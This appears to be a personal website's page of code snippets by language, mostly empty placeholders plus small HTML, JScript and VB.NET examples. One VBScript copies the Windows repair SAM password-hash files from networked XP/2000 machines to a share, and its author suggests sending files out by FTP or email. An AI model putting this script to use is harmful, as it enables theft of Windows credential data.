So far this area is really lacking in content, because I am lazy. However I am making headway on how I want this whole thing to look so IMO blank or meh sections look better than no sections.
HTML and directly associated | ||
| Obligatory filler. | ||
|
The following is outdated and really should not be used anymore, unless you are pulling data from a
remote server to a locally hosted page for some reason. base href="http://www.lolprograms.org" | ||
| Top | ||
VBScript | ||
| I was using this script to copy the recovery sam off WinXP and 2k boxes over the network to a local share. Could be modified to grab any file and send it to a FTP or even as an email attachment. | ||
|
Set WshShell = WScript.CreateObject("WScript.Shell") Set objFSO = CreateObject("Scripting.FileSystemObject") objFSO.CopyFile "c:\windows\repair\sam.*", "\\available drop point", TRUE Wscript.Quit | ||
| Top | ||
Jscript | ||
| In page random number generator. | ||
| document.write(Math.random()*1001) | ||
| Top | ||
ASP | ||
| Nothing at this time. | ||
| Coming soon? | ||
| Top | ||
PHP | ||
| Nothing at this time. | ||
| Coming soon? | ||
| Top | ||
Java | ||
| Nothing at this time. | ||
| Coming soon? | ||
| Top | ||
J# | ||
| Nothing at this time. | ||
| Coming soon? | ||
| Top | ||
VB.NET | ||
| Here is an excellent way to pause to ensure that a webbrowser control completes before moving on. | ||
|
Sub pause1() Try Do Until wBrowser2.ReadyState = WebBrowserReadyState.Complete Application.DoEvents() Loop Catch ex As Exception MsgBox("Error in pause1: " & Err.Description) End Try End Sub | ||
| Top | ||
C# | ||
| Nothing at this time. | ||
| Coming soon? | ||
| Top | ||
C++ | ||
| Nothing at this time. | ||
| Coming soon? | ||
| Top | ||